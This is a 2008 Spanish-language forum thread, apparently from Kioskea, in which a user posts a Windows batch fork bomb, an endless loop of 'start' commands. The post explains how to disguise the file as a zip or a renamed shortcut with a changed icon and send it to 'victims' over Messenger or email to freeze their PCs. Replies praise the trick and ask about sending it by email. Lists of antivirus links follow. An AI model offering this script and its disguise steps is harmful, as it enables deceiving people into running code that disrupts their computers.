Flux rss
Buscar : en
Por : Fiabilidad Fecha Nombre del usuario
Statut : No resuelto

VIRUS PARA TRAVAR UNA PC POR MESSENGER

MAXWEL, el sábado, 26 de julio de 2008, 17:06:02
Hola,
AMIGOS LE ENSEÑARE A HACER UN VIRUS QUE SOLO ASUSTARA Y TRABARA LA PC DE SUS VICTIMAS ES MUY SENCILLO
LO UNICO QUE TIENEN QUE HACER ES IR AL BLOCK DE NOTAS E INTRODUCES LOS SIGUIENTES DATOS
@echo off
:uji
start
goto uji
exit

luego le dan cerrar y el te pide si guerdar y le das si
lo guardas como quieras la importante es que al final del nombre diga .bat y le das guardar
despues le das clik derecho le das enviar, le das comprimir en zip luego lo puedes enviar
si estas en otro compu le puedes crear un acceso directo y cambiarle el icono y el nombre

eso es todo para que le den un pequeño susto a un amigo
este truco no dañara la pc por ser simplemente un comando
el pc se reiniciara y luego abrira como si no alla pasado nada
espero que les guste gracias
si queren me puedes escribir a mi correo
toteo_20@hotmail.com
Configuración: Windows XP
Firefox 3.0.1
 Señalar este mensaje a los moderadores

1

• 1
    Este mensaje le parece útil, vote !
  • Ce message ne vous semble pas utile, votez !
  • Señalar este mensaje a los moderadores
Nnet, el lunes, 28 de julio de 2008, 14:13:35
Hola

esta muy interesante la informacion..Mi pregunta es la siguiente tiene igual de efecto si uno lo manda por mail?

2

• Este mensaje le parece útil, vote !
suares, el martes, 29 de julio de 2008, 22:47:57
AMIGOS TIENE EXACTAMENTE EL MISMO RESULTADO EL COMPUTADOR SE TRABARA PERO NO SE LE DAÑARA NINGUN ARCHIVO
ES SOLAMENTE PARA ASUSTAR A TU VICTIMA ATT:MAXWEL
SI QUERES PROBALO Y VERAS
O PROVALO EN UN SIBER
GRACIAS.

3

• 1
    Este mensaje le parece útil, vote !
  • Ce message ne vous semble pas utile, votez !
Nnet, el miércoles, 30 de julio de 2008, 14:37:10
Que bueno!!!!! Gracias por la informacion

4

gggg, el viernes, 22 de agosto de 2008, 07:29:24
oie io no pude....no se xq pero no pude hacerlo...

5

thugs, el viernes, 5 de septiembre de 2008, 01:48:49
eeii ta chid man ajahaajaa bientraumado ne ta chido carnal mis respetos alos hacker soi la mamada yo quisiera ser uno de eelllo pero se necesita estar todo el dia en la compu ajaj bueno sobres man

6

hola, el sábado, 20 de septiembre de 2008, 04:32:54
oe causa puedes enviar a este correo astrocito01@hotmail.com

Resultados de

Como sacar un virus de mi messenger Hola,me gustaria saber como sacar un virus de mi messenger y saber tambien quien me elimino de su messenger es.kioskea.net/forum/affich-35331-como-sacar-un-virus-de-mi-messenger
Eliminar virus Pc fallo Win32 (Resuelto) Hola, Hay un virus, la PC me fallo y me tiro un error WIN32. Como lo elimino? Chau es.kioskea.net/forum/affich-2064-eliminar-virus-pc-fallo-win32
Un virus.. hola tengo un virus en mi messenger qu me madaron y no soi a quitarlo con ningun antivirus como podria hacer para sacarlo de mi messenger es un virus que hace pestañear mi messenger y luego les manda a cada uno de mis contactos conectados una pagina... es.kioskea.net/forum/affich-21002-un-virus

Resultados de

[Virus] ¿Que hacer cuando el PC tiene virus?Si sabe o cree que su equipo tiene virus: 1. Detección Haga un escaneo del PC con un antivirus "en línea" (se necesita Internet Explorer con ActiveX autorizados), por ejemplo puede usar: http://housecall.trendmicro.com/es/... es.kioskea.net/faq/sujet-154-virus-que-hacer-cuando-el-pc-tiene-virus
Virus y Malwares ... El truco para eliminarlosGran cantidad de virus, troyanos, spywares y malwares circulan en la web. Estos cambian la página de inicio de Internet Explorer (o en algunos casos impiden cambiarla), provocan la aparición de pantallas no deseadas, y ni hablar del riesgos de que nos... es.kioskea.net/faq/sujet-199-virus-y-malwares-el-truco-para-eliminarlos
Mi PC se reinicia soloÍndice ¿Por qué un PC se reinicia solo? 1. Memorias defectuosas 2. Conflicto de hardware 3. Sobrecalentamiento del procesador 4. Alimentación defectuosa 5. Conflicto de software 6. Hardware defectuoso 7. El BIOS 8. Los virus Enlaces... es.kioskea.net/faq/sujet-382-mi-pc-se-reinicia-solo

Resultados de

No tengo sonido en windows media playerHola,tengo 2 reproductores de musica en mi pc el creative y el windows media player, mi musica la tengo en un disco externo para evitar que se pierda si le entra un virus al pc pero no reproduce el sonido con windows, con el creative si puedo escuchar... es.kioskea.net/forum/affich-23310-no-tengo-sonido-en-windows-media-player
Win xp instalado dos veces, 2 opc. de iniciarHola, Cuento mi historia. Por culpa de un virus mi pc no me arrancaba. Instale Win Xp sin formatear y ahora cuando enciendo me sale dos opciones de inicar windows. Una que creo que es la que falla sigue sin arrancar y la segunda funciona, pero no creo... es.kioskea.net/forum/affich-27763-win-xp-instalado-dos-veces-2-opc-de-iniciar
Virus en pcHola, Tengo un virus en mi pc( win32/Spyware secure) segun me dice el nod 32 pero este no me lo elimina.He probado con mas antivirus y me pasa lo mismo,me lo detecta pero no me lo elimina. El ordenador es un portatil,y tiene instalado el windows... es.kioskea.net/forum/affich-18637-virus-en-pc

Resultados de

Descargar AVG Anti-Virus Free EditionAVG Free es la version gratuita del poderoso antivirus tan conocido. Basicamente proporciona seguridad en internet protegiendo nuestra PC de los tantos virus que estan dando vueltas. Una de las ventajas mas notables del AVG Free es su sistema de... es.kioskea.net/telecharger/telecharger-952-avg-anti-virus-free-edition
Descargar Pc Tools Firewall PlusPC Tools Firewall Plus es un potente cortafuegos personal para Windows® que protege su equipo al evitar que los usuarios no autorizados puedan acceder a su sistema a través de Internet o de otra red. El seguimiento de las aplicaciones con conexión a... es.kioskea.net/telecharger/telecharger-1355-pc-tools-firewall-plus
Descargar Bopup MessengerBopup Messenger es una aplicacion que te permitira mantenerte en contacto con todas las PCs de tu red local, por lo que es ideal para grandes empresas que necesitan estar en contacto constante aun trabajando en diferentes pisos o lejos uno del otro.... es.kioskea.net/telecharger/telecharger-539-bopup-messenger

Resultados de

Virus - Utilidades de desinfección Una herramienta de desinfección es un pequeño archivo ejecutable que sirve para limpiar un equipo que ha sido infectado por un virus determinado. Por lo tanto, cada herramienta de desinfección es capaz de eliminar un tipo de virus en particular o una... es.kioskea.net/virus/desinfection.php3
Virus - Nimda El virus Nimda (cuyo nombre de código es W32/Nimda) es un gusano que se disemina a través del correo electrónico. También posee otras cuatro formas de difundirse: La WebCarpetas compartidasAgujeros de seguridad de Microsoft IISTransferencia de... es.kioskea.net/virus/nimda.php3
Virus - Magistr El virus Magistr (cuyo nombre de código es W32/Magistr.b@MM, I-Worm.Magistr.b.poly o PE_MAGISTR.B) es un gusano polimorfo (un gusano cuya forma, o más precisamente su firma, cambia constantemente) que se disemina a través del correo electrónico. Se... es.kioskea.net/virus/magistr.php3